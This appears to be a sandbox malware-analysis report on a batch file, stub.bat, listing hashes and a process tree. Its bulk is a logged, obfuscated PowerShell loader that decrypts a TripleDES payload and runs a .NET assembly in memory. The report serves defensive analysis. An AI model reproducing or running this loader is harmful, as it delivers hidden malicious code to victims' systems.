| File name: | stub.bat |
| Full analysis: | https://app.any.run/tasks/80b74700-8c6d-4c51-9ed5-267ed02ac045 |
| Verdict: | Malicious activity |
| Analysis date: | February 20, 2026, 14:51:07 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/x-msdos-batch |
| File info: | DOS batch file, ASCII text, with very long lines (3015) |
| MD5: | D410FA378B108C873FE9F767F2AD90FC |
| SHA1: | 7B144706BD914DD461B54D0AF3721197CA4905F1 |
| SHA256: | AFFF07EA761185BAB43C00C5ED27DA3B5F517D16612188E5B7AC4E9AF81FE01F |
| SSDEEP: | 6144:MoZ00hO1kHx06ITkZ9vQPeDLSBmjcFRICHVijLggjw1FFKkUylt:J0CBR06/QmDo+cUC1QwspE |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1368 | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\stub.bat" " | C:\Windows\System32\cmd.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1732 | fiND /i "openconsole.exe" | C:\Windows\System32\find.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (grep) Utility Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2572 | taSkliST /Nh /fI "imagename eq openconsole.exe" | C:\Windows\System32\tasklist.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Lists the current running tasks Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3500 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3576 | cmd.exe /c ([char]112+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bw==')))[0]+[char]0x77+[char]101+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cg==')))[0]+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cw==')))[0]+(f{} 'h' -f '')[2]+[char]0x65+[char]108+(f{} 'l' -f '')[1]+[char]0x2e+(f{} 'e' -f '')[1]+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('eA==')))[0]+[char]101 -join '') -enc JDBWID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZW52OkJpdzJkQUphdU4zc25QWCArICRlbnY6M0REb1FFSml3cDlJciArICRlbnY6SHA1b0paUmVxQ2VtRVMgKyAkZW52OlRlM24zVmF6S2NEICsgJGVudjpISkk5OGU1dGxvRzJBVHlTayArICRlbnY6YlRkeFF4R3hPUXRJICsgJGVudjpGbVJmQU10SlllT1NnYUF6ICsgJGVudjo4UVlFTDVHa2hMSmYgKyAkZW52OkpvbkoxQTlUT2cgKyAkZW52OmdqcFd4TVIzUUdyNXRKICsgJGVudjo0RllNV2IzdkduaSArICRlbnY6cVVCeWtBSGFmdlN2ICsgJGVudjpGVzk4dVpGU0V5ZHV2ZEQxbSArICRlbnY6M0FtTVM2RmhpNDE4ICsgJGVudjpMekJNbUVpYmlnN0lzUndRICsgJGVudjpqREE2Z09BNGtKICsgJGVudjpZbUxFeFQ0Z2R2TVUyR3ZjICsgJGVudjo5aDR4VGxkSDg1UE52WXEgKyAkZW52Okl2MlF6Z2tpc1RmMyArICRlbnY6ZkFFR2JtYWNwQkZRZUtpMSArICRlbnY6Z0p4QzBubXByR2syaXlyICsgJGVudjp1VTdNSzdNd0p3MndUM1RYICsgJGVudjpJSVBmdTFrRGN5YkVBS2MgKyAkZW52OkhnNTFwSmZEMDA2UUR4WFhjICsgJGVudjo3MUFIRkM3WUpkNGk1cDA2byArICRlbnY6OUFod0FxcTBSeCArICRlbnY6QnlkczVDbVhQYnRjUiArICRlbnY6VWdWU3huWENvUGh6cE5nMnphUiArICRlbnY6N1N1NWVDTldnYThabE1HMTMgKyAkZW52OnFUcnBzUWdQZXhhICsgJGVudjo4SWg2RUo0WUFWWGdpVXggKyAkZW52OmVHVGxzajBDQWhUICsgJGVudjoxVXdKUmJHTUZQMyArICRlbnY6Q1FTYU1NTG11MTZTUG5VSyArICRlbnY6bVRZME8ySmRoSG0gKyAkZW52Om8xV00yZDN3ck5BaCArICRlbnY6blZmRlNJOGRpRnhNdGwyQVggKyAkZW52OlFhMkJyYWRCSENaZ1VnU3QgKyAkZW52OjNvemI5TUhoZUQ0OEswYjIxMiArICRlbnY6OVBOWTNZUkk4dE84ODl1ICsgJGVudjp6RFdJN2o3Q0docGVHICsgJGVudjpXNFJHbGc0UUY1WiArICRlbnY6NVN4bHBEUUtaQjRIeU00ICsgJGVudjp5NmdsYW5DZVhmICsgJGVudjp6ME53VHpHVHRsdjR2cSArICRlbnY6U0VvT1ZFTW9oMTYyWkYgKyAkZW52Okl0RWtPazh3d0d4TGp1U0tVUVAgKyAkZW52OnRkMnZtVmZBWThNTUdmICsgJGVudjp5eUcza1VRV3hnbkkxUm5MQSArICRlbnY6TWh5amU3eW9VanE1bFZWQ1NuICsgJGVudjpsb2prMkY3OVI3WWFwICsgJGVudjpncERlZWNlbldheXQgKyAkZW52OmtFMk15cjJyRGtiICsgJGVudjo2dUJWTEtPZnBJQTdCICsgJGVudjpiOWFkazZmcGxONzFFVUsgKyAkZW52Om5xcjQwVXBEMFYxb2YyUUggKyAkZW52OlU4QkRabFdiajFsRSArICRlbnY6T25VdmJmMEJTdEh5YWYgKyAkZW52OnNXWDlIckpxaWJSVHVsSTFRdzMgKyAkZW52OlpEeDZlNlZtSVExVUpZVU8gKyAkZW52OjJrYTJ4Q0xsM2tCZlQyZyArICRlbnY6Y1F0UzQxT2ZBUzNWICsgJGVudjpMOG9iNEN4TU1YMjlhRDEgKyAkZW52Oldsb004dUZxcGFoRmogKyAkZW52OllxM2NSMGtKMTdGOSArICRlbnY6dGszNDEwbFY0aHFINyArICRlbnY6WVk3aUtxenc4cCArICRlbnY6WVQ5b002OTYyNEZsSU90WiArICRlbnY6QmM3NmptR2RoaWsyQyArICRlbnY6eE5qMTVtbG1uWHh2SmJKdkNiICsgJGVudjpQMnc5bTVMdE1yZTRnbDZUbyArICRlbnY6QjA3VW8wSHhhbUQgKyAkZW52OmlRa3d3c2lxbEI2dEtkdHdKICsgJGVudjpOZmF1dTNQdVljM1RNICsgJGVudjp2S1huQjFHcG4wM1c1MGpCKTsNCiQxViA9IFtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlRyaXBsZURFU0NyeXB0b1NlcnZpY2VQcm92aWRlcl06Om5ldygpOw0KJDFWLktleSA9IFtieXRlW11dQCgyNiwyNywxMTAsMTg4LDgwLDI1MSwyMjAsMjQ3LDg3LDEzNSwyMjQsNDEsNTEsMTYzLDIwMSwxMDEpOw0KJDFWLk1vZGUgPSAoKGZ7fSAnRScgLWYgJycpWzRdKyhbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCdRdz09JykpKVswXStbY2hhcl02NiAtam9pbiAnJyk7DQokMVYuUGFkZGluZyA9ICgoZnt9ICdQJyAtZiAnJylbNF0rW2NoYXJdMHg0YitbY2hhcl02NytbY2hhcl0weDUzKyhme30gJzcnIC1mICcnKVsyXSAtam9pbiAnJyk7DQokMlYgPSAkMVYuQ3JlYXRlRGVjcnlwdG9yKCkuVHJhbnNmb3JtRmluYWxCbG9jaygkMFYsIDAsICQwVi5MZW5ndGgpOw0KJDNWID0gTmV3LU9iamVjdCAoKChbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCdVdz09JykpKVswXStbY2hhcl0weDc5Kyhme30gJ3MnIC1mICcnKVsxXSsoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnZEE9PScpKSlbMF0rKFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ1pRPT0nKSkpWzBdK1tjaGFyXTB4NmQrKGZ7fSAnLicgLWYgJycpWzNdKyhme30gJ0knIC1mICcnKVsyXSsoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnVHc9PScpKSlbMF0rKGZ7fSAnLicgLWYgJycpWzFdK1tjaGFyXTc3K1tjaGFyXTB4NjUrKFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ2JRPT0nKSkpWzBdKyhme30gJ28nIC1mICcnKVszXSsoZnt9ICdyJyAtZiAnJylbNF0rKFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ2VRPT0nKSkpWzBdKyhme30gJ1MnIC1mICcnKVs0XStbY2hhcl0weDc0Kyhme30gJ3InIC1mICcnKVszXSsoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnWlE9PScpKSlbMF0rKFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ1lRPT0nKSkpWzBdKyhme30gJ20nIC1mICcnKVszXSAtam9pbiAnJykpIC1Bcmd1bWVudExpc3QgKCwkMlYpOw0KJDRWID0gTmV3LU9iamVjdCAoKChme30gJ1MnIC1mICcnKVs0XStbY2hhcl0xMjErW2NoYXJdMHg3MysoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnZEE9PScpKSlbMF0rW2NoYXJdMHg2NStbY2hhcl0xMDkrKGZ7fSAnLicgLWYgJycpWzNdK1tjaGFyXTB4NDkrW2NoYXJdMHg0ZisoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluhdiUcD9N%VqBY4q6e%oMdIOMp%Unov2EA%IlXobUZO%sOBL07%PvuhKjtO%jlC54%RK5HpT%BEO538jZ%WprsLxj%I6SlH%pslAm9sG%BgTA%qf1JmM%wIxlcB%DnKsejA%uu93W%TFENz7y%sLVFPnj0%lUmO3b%rOvIM%fQ4zz%Yw9Lx%yIsmqlMM%OzXr%mIax%UTiBfP%NkoS%MhVe%sOC7Yyqr%EEX2aVO9%hL04%tlFu%XeUM%j7SM%yFWjO1t%hvddgu%Ej9LM%Eqls8qZ%Qvi5R6GO%a5raArsY%pIrAgC%IJRqr%eFwE%hS52nR%C6FJy0oY%T9W8yd%Rd68j%naMEzA1v%qroSHD%Es9Dw%bFoYpT3%iiE9oh%Cmfj8%jPr7%ldpPK%lIPHpQ3e%QGo9%PoyC%l3FPFB%WQyAfi2%mIpwp7w8%VoE9J%GUXIUQ%krMzzl%n25wMQ2%dQjCF%HduhjZd%NDZX%UGAIw%VZq9PZ%GnBGC1%oVDlb%FT52NV%LkwKoL%WxVfUW3%E7pe%fo2oW%LIL3qDld%B1nh%Ss4fm%wBvKx%Zy89D%DaOU%gL31b7%ZQTeO%LBQ5%ImCD93Z%p5Rhe%kVSDi%Nzs80Uq%s325N%EKju1il%SeUVm%UxUi4O%kX9MOf7b%Q2pjk%o3igelb%Ldcfwm%gbtT%qv7djeX%BZlyB7%eHC491rD%YK8fP1B%aNWm7W%GGRljJ%OOIiwCZ%RpXW8%USr7HCO7%fxpqjpo%GdGL6%nMSHrRy%ypyFqt5%RwTRH%Uha0z9%tHh4yF%xZGeR%O5nhIbGD%jA2MUPa%Q623MlFw%CnxoVm%c0BVYT9I%DNWJjt%eHLdcT%l0L6SCIx%HQCc7NGV%vwOmsLu%VZd6q%pPxAGQ%HiXMztH%LDZ4%I2ms%oyPWM%o24IHsqd%SBclsd%Gwdu0b1%I22F%Hc8qJg%X0F5%obBm%oVRoB%stzu4Lhe%Fr1VpFrx%SnwLHg%KhFvqr%XLVRD%CGKWU%ftsul%spePSxzB%GtBls7%p64Uk%nvkOy2t%NhKfMhB%W2qhJv4H%lPFAIL%lSonIEo%dijFe%bhzB%OMfQa0Mi%UNFbpN%cHLJaONt%KOa4cg3k%p5j3W%MSrurw%tv6N%Hm1GesWG%MPPWfoK%RF2IBTz%vXfv%U3K00C%ooeibqLo%VIWZSp%edfK0q2%DiJ3r%TbmHb%dbvZJ%VAm5%jYyh0%AuK2vjn%nE1W0k%U6s5BQ%mnpmch%AxMq%IWOpx%aDQkH%QrCWHiv%CNieB%Odi49z%cvpGj%mLayGkp%aSMuST8%T8y3%OJOvJzqP%O8oM%auhIQn%rnT8%oQ32h7R2%TGCtc6b%wtv4lG%u6ir%iIjtk%f5hB%JcH2r%aTWqrA9%ACb6z%Byxa%DeS90%E9jQN5%gb4Gz%BfaztP%iPokL%TqBoz3S9%HGAsi%XYO9mkg2%hm13dG1%N0awsv%zASG39d8%UgoQ%sVmiRzyn%pIILq%DAP9Vq%RpD4j3%XGwaOoY%roHfa%HSHR%radD5%qg6G4U%vcgU7%duw7Mb%mabb%Sdmx%B5WoTXDe%jCZL%ChTmr%Ocguy%TLAph4Z%MZgUPvM%D9bfFc%DQfb%RrXV%d2zEg2%OHAVJ%ryzdc6%SaYup%FnQS%Cz32UcZ%yS2XQSj%c6D2KA%MmDF1m7%nVsp%HMmJXy%Nucv7J%g4SpyXt%bG3K%R4iW2M%QyNuJp5%TRuNP%wWEQ%NcCgT%Q1XMLgj%eNFYU%vKzBll%dwUc1%V5HB%vArT%Bu0lu7f%Rr9W%v0BUL9KY%qhMZnT9h%aOzRYqQr%bItgWL%GmDll%lAbH%d7yNQ%PW7H%dvAr4l%ILA5%uO0w%i2Jw2EF%LCiwgN%vFuNPDF9%W3uY2vX%DvqkXMy%SYeqiP%ESqDGI%LVsLUx%CVcT39%cqEYb%roV5X%a2y6AAzu%dWX6dR83%caXv%JXHK3Ap%MKqp5MB%OVcj%GIFaPu9%cFKIxF%oKQk%OVhQ%vWl5E0H%MrcNnk%XTnjvDtI%UeHwN%Db9pAqvg%OwgHlyE%aRJiWV%V9j5fyT%mdrznd%dhnf4L%A104%fQvk%SRY2%V5bxP7b%aGfetaF%VJNxum93%kdTR2%Vt8QZCK%OXgvfq%jrBGu%BiM6%jlMWYr6%ATed2F%KXMwtw%BPLz%VByKE0c%fIHAes%l2FN%KAr7w0N%Xq7Po%Iyhio6rZ%xcnoKq%MwZVnjT%bVqlY%RBiQH1%IoQB%AgUqTx%pHYjvfFT%zrqLHX%op9jKSk5%UYjDoZY7%TD9Ast3%afU9MA%fT1Dpva%A3jYkE2e%VRz5zY%mz63fl%AkTdD3%xvWlNYPb%Ci0vcd%Rwcj%RSfC%pSNJYC2l%GAKDR%sbgH%YnEI%a9jl72%Hbkc%E8WStqgx%Q6UOXZ%HELqDKY%E1M6j59%NgdxzHST%Cb4p%KKsa%k5v4BQ%qi1vFk%Y3JmMF2%Uxdj65%t5ESSt7k%iu0LAY%MoshH%Fk9rr5%M8MKKbmg%D29A%Erde%OKyr%DaCsL%dAQrv%s8jZX9Bh%pIY7G%Qc2i3DU%Cp7XJY45%Z6aYeue%kdPmy%u67Wz%Whk2Xd%koytAG2%PuthPt%uS0B%qOR0AaM%zBI63%YZRBT19%p5WLzxL%Nue5f1%Tg4RX%IBzf%R90uzTF%DSGBWdK%mI11j%qff5GaV9%woQzH3%ISuC%MLINwju%yroU0Zpe%nvIBFLr%evvjNfl7%SZq2SA5%vwz9nvz%SMTedgd%VgMhG%lcNxc3%a9211%qDUU9P%NixjM%Ct3m2K%nEBv%M9HK0DE%tmPBH%r35d3Xz%R4Zpqu%kLF4q%jqIeMN%qFylUvgf%Ul52PJeB%cHrfJW%xJyOLd%ZZuiQzHM%hwsfn%QzGB5H%v4g6Y%UgDSg%qW4H%Mg0VJu%SHsue%KHfg9Hn3%uBZGrQx%CM1Wc7k%oHrk%reqoTy%oGvl%jiSbwxN%xxBY6%vpVhn%KPgFhc5d%wC2gX8%cg0Cow%urluiiaW%pdfc%yh2c%BExAiRk2%ztJhd%Zio4BNLB%n07ebc%bbd5%GlVt%fwl3%N1eOPup%QPhh9%kcZSpL%D5lr%PwSSxWg%vqAiO%HpmB%stnHlTx%hakzP%S1lMz%MPpa7N%s0p8%da8H%WzUn2Qqx%yVnBbOy8%oQf5%WZ8DKw%GGZjh%IMqk93%oSZFnC%JmQ6p%oAfn%qIovk6n%k4k9L%pfEtqR%K5SsXJZ%CFNYqydS%jc24p%yxxiK%M7NUUBZp%cmq5XDxL%wtdtQBpF%urdXj%Ixc3GS%HOQfhsMj%Y1n1%RXSmU%pDsdpf%hzl7Q%o98RxzY%DHrLTM%B04u%OCeHxzTv%ShqBl%sn311pe%d2Ct%LCWi%VR79voq%A2sF%MReQhdN%eTil%MYd32g%Uq0tMN%UkEA9QH%sHYu78n%psW1c1c%NgzqlSN%HS4E%pjGL%elwlZjRx%TsbUh2MU%TC32aNV8%dzpyp5l0%tIXgF%Twvv%i9XPSoZ%hT9IA%cY3J4aMo%liAW979W%z72LoX%Mek1RQ5%VUPD%CBXR0k%Qpurrd%dvsX89xo%s8FD%aiHp5%rQxA%Ll8Fho4%AYRaOYJ1%L1bGTKdR%Tlkm%nJj2G%tG1eA%lr9WGg%EEQm6s%diBJd4u%AKYqBMIM%rtwl4%KEe5B2%Vjj3Cc99%QhLX3lvH%P5Fz6%FPriJz%vXhf%ChTsMEY%uwj4%IqH4f6X3%mNMk%wvm7lx%mdFQcwK%hnhH4lI%wZHLHbNA%dHTCM13%jluzE04%DqAQmu%d9e21NF%xHfYVu%nDCw%OlGsCb%fFCI%axAY8U7Z%a1WU%X8OPP%r8RHKG%LzMG%jy7k%QTPJHXU%Ho9Ohyd%lhhbhA6F%ZHIOVbNG%HzsyJl6w%ginF5%VoKl4U1%aHCG2LL%rYdt58%wuvsnv%bny1t%f70Ys%Re111n%IIgVvSn%AFIEvypU%TcUB%zWQysi0%oEiup%BGmI9Ss3%cHvqn44%Axo7%mvQhPPyb%gzL2tH%z6aHjWj%P2hlS%UyTalwf%WiVz%hYO8%SUh7qZJw%A9wBOM8%CYJUH%qX63r%iB6zdTlB%etsauLQV%hSvje7%wzfNYRf7%ssl13Lmw%seDt%hw9Ix4Cz%rJplPyXf%zgETQo%g99hpZQ%FdUU3Y%nLdb%NG8CPc9%JjMpiO%ZdSCTV7y%WDgTv8z%EcVZLX%WCUW3Q%V3zd7vHz%mH7HdL%g2ja%TBT1e%WVWX%bUYj%gYfcea%wU4ETq%hzTi%bywB4%KUNq%klRuBls%tIhEnuI%Wh4s7F%RzNmDHG6%gL0q%HvA1huGK%kBFu%dO9v8px%UfJzU%kZYXrw14%tmJTl6S%kpQu%E5XDRE%EeRlGO5t%sqPWR%khMUhC%MtceKc%Ec5j5Is%iwkKQ%cmUI%mR8KbYg%u1oEf%hXqGcb%dvaAT%n7t2VhZ9%oUFl2%Y6O6H%NyWD%UY6HwvNe%tzSG%bVw6hD%emLnAkf%lIf0%uRJHe5%hFxz4%QTApB%tSiZVB%AFcwg4T%KFsRt%LRaWr%zspYr%sm5E%JTIV%H8xT%rojPB%a9qm8MVp%bU2b6Z0%RSmfJIi%tg98%XcKw%NG2c%tRqE3%Zgj8GwrX%BiEnobO%QFncuI3H%lMWHi%T6GJ0zKC%hkTgzj%nb87L%h8atur%HP8qeuO%zOPpjj%uFO0%wEBVD%g7oDD3N%x0AN%h653X%hrPqSXU%ROqF%pR3u4G2%E0jkzd%Dhob9bcJ%XYqwN%tC0wU4%dV8I%vcjis6%NKGDwm9c%VzsS%hvTAA%WiYOdS2%crrJcI%OKzQtD%aDvLxJ%ivEFDl%kKYsS%aVgR%xTJ6%AH9c%VZOpIGrz%XIGnB7M%LFCA9JfO%omLdy4mg%o4ss%cpoga%wvgO1G%IJGOAKWD%b035jo%dVof8C2%RtOZV0Hx%ejx5K4On%gpV5T%p8W5oG9p%DrR4%ckbBWUMr%WbP03%JWccZh%VqLoLQVA%EjlpA%swAt9U%IPnv1FvY%qVmc%Je2QaGc0%LnTAT%KJULMdRc%sFBCs%qMkh%b8wO%wd8CmQ%N6Cg1ZO%xCINkES%ssCm%Ff8xS%mojCg%idDFxLp2%Z57zwKGJ%KJFhu%a8zsv%RhjR%l19qxYSb%FZXkyutH%RURj1T4%tmO4%dEEC%ZV12%Jnu3H3%Hw4gMA%rDvnUTtl%xkwj%sQSJqqID%a0DTx%YcxCfp%SkyA%QBwA2Z%S16Mb%DZ5tE%tGWgP4%aIQeT1%JiCLf%jTya5e%bCl8%qovXfQ%evqVEuPQ%KCNQBU%LBgC%Fgc2U%eHW3NPpC%T2vqtp%IY7dVlC%DpzHG9RE%iw5gbC%rdzlSNn%LGjllo%MoIpQ44%LoY0%cYgm8%qKC6ezPe%DOoJO9gl%YZHB1a2N%zg0m%jjss5%i9412o%rBOKgazJ%inU3%toQaPaQo%vgtk%F7KBt%sh5Y%KYxMx%mhch%jTtZA%nCkCm1A%PaxRb%gwB3mH%CYnfBA%lQ2ipP%Xk3Xtmgg%y4O9sze%gxMpefTm%hOw7z6O%D9YhI%EzLzIj%N2efz6%YcnEr%uJ0zkM%UFJBf%jtGeN04U%hYN3%p2KZ%fa16M4li%weBMdFJN%JJuULK%cYhl%nO8AOW%Nw5UH%RHGlp%I7worAye%C6d8q%Rqg0s%bpho%IOwC%EOsUJ%rT1dH%MhND%eQtvvk%T7EKxFg%sW5UMQxA%dx6scX%UaX92t4%OrhfF%rs2zTLkU%jMoNgvs%DhRc%hQBd%IoNVze%skYNj%cJIveq%rCU5%rEzs2Fm%p7a72dQ%UarWg%cXWZ%xzA6QYxD%P9XzyMkB%k2YU%g1pwv5%m2f744X%Pove%CZc91Lr%oIGdXy%UcZq9%kFWH%Zwu1WiaH%kMxN%pd5z%twsnFT9l%BAP24%hfQ7bf%j64BeI%SYjE%dhw0%W2hkd%Tusz9tT4%sDht%G3MY7c8%nyvtK%OItnc%fBOwyQK%Cvne%Untu%c8ra%KhyiWVpV%kg75%gqr4%XlVqUz%Y6M6BjC%poxkR0t%QRPjWrUe%OEug6%WhyZa6Ef%sQ4X25%OdPSC5b%rYs5%soo7D%fAYxW%PIR2cS%kh7iBDCU%q42iO%xgrFn9GQ%VgO6%oIAt3aE%c3iMjv%tESC7%NP2Bu%EgnYrWAb%rFng11E%jhIwZ%cKGA4%Te8G14c%MUHr%q0nA8Gl%ISB39vEe%vvTJ%BKbaSU%YLkSfNB%gO3aqe%xS8ly%u8ax0%PzHWfpB2%MPoHH%mZBa7q%YRnYXXx%QLQh4a%mJGFE%BXAE0hN%e0cxcUYd%j6WG4%UIXjwUdr%l2JEZ1jK%wqAneE%hWxwuTz%mLhPOT%ogHKJc%aLPhk%zuPxUTD0%TBpI%Purb%Ao9LM%ygubULy%II8p0Fjw%Y43w%PBcHxbW%CGi8%OYKlar%zvVv8%dACAi%SIIwjlA%DN5z2pF%ExcWCkD%tCm5s%S5ww%xP2aR%A3eLE07%z5hWf%di7Jp%kztJAukP%cXi0%oAKjJayS%JKNDYW%J9mdAD%UJIN3E%mIHHOvsL%HqghCA2%BJKW0fuy%ZV3OK%NWfW0y%o9vP7Y5%OEyd0%jrzL3Z%huW4bgI%B1yI%BncEpXU%CDxubjGO%GqxaM%M9zQ7DNz%BX6qs%a8x02nq%ooE4ns%oeXB%l1uN%h8o9elr%vsavj%puw9hMA%uTW45N%WzbQ%GGpKhSOx%AywUwcQ%U0b7xU%Tt13Qes7%R3o7jx%gfSSU%j5HOahs%Yi4ki%hbdECh2Q%x9Ji1F%wXAVfdEM%X3slT%iVKxuC1%CqGya%XGW9Um%zXzbgI%eO5TKx%judL%KBmT3YZm%J0PL%LOg8l%lRZSsJ8m%csjo1%V6Yh%MV10HC%AxlE1%NdOdZ%RlS2%WVTT%xffurp%s0AR%KIAxuUq%Pv2j%OEEUjbGlhbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCdidz09JykpKVswXSsoZnt9ICdjJyAtZiAnJylbNF0rKFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ1pRPT0nKSkpWzBdKyhme30gJ3MnIC1mICcnKVsxXStbY2hhcl0weDczIC1qb2luICcnKSkgLUZpbHRlciBQcm9jZXNzSWQ9JHBpZCkuQ29tbWFuZExpbmU7DQpmb3JlYWNoICgkMTFWIGluIFtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkdldEFzc2VtYmxpZXMoKSkgew0KaWYgKCQxMVYuR2xvYmFsQXNzZW1ibHlDYWNoZSAtQW5kICQxMVYuTG9jYXRpb24uU3BsaXQoJ1xcJylbLTFdLkVxdWFscygoW2NoYXJdMHg2ZCsoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY3c9PScpKSlbMF0rKFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ1l3PT0nKSkpWzBdK1tjaGFyXTExMStbY2hhcl0weDcyK1tjaGFyXTB4NmMrW2NoYXJdMHg2OSsoZnt9ICdiJyAtZiAnJylbMl0rKFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0xnPT0nKSkpWzBdKyhme30gJ2QnIC1mICcnKVsyXStbY2hhcl0xMDgrW2NoYXJdMHg2YyAtam9pbiAnJykpKSB7DQokMTJWID0gJDExVi5HZXRUeXBlKCgoZnt9ICdTJyAtZiAnJylbMl0rKGZ7fSAneScgLWYgJycpWzRdKyhbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCdjdz09JykpKVswXSsoZnt9ICd0JyAtZiAnJylbNF0rKFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ1pRPT0nKSkpWzBdK1tjaGFyXTEwOStbY2hhcl0weDJlKyhbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCdVZz09JykpKVswXStbY2hhcl0xMDErKFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ1pnPT0nKSkpWzBdKyhbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCdiQT09JykpKVswXStbY2hhcl0weDY1K1tjaGFyXTk5Kyhme30gJ3QnIC1mICcnKVsyXSsoZnt9ICdpJyAtZiAnJylbNF0rW2NoYXJdMTExKyhbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCdiZz09JykpKVswXSsoZnt9ICcuJyAtZiAnJylbM10rW2NoYXJdNjUrKGZ7fSAncycgLWYgJycpWzNdK1tjaGFyXTExNSsoZnt9ICdlJyAtZiAnJylbMV0rW2NoYXJdMHg2ZCtbY2hhcl0weDYyK1tjaGFyXTEwOCsoZnt9ICd5JyAtZiAnJylbM10gLWpvaW4gJycpKS5HZXRNZXRob2QoJ0xvYWQnLCBbdHlwZVtdXUAoW2J5dGVbXV0pKTsNCmlmICgkMTJWIC1uZSAkbnVsbCkgew0KJDEyVi5JbnZva2UoJG51bGwsICgsJDZWKSkuRW50cnlQb2ludC5JbnZva2UoJG51bGwsICgsW3N0cmluZ1tdXSgsJDEwVikpKQ0KfQ0KfQ0KfQ0KfQ== | C:\Windows\System32\cmd.exe | — | WmiPrvSE.exe | |||||||||||
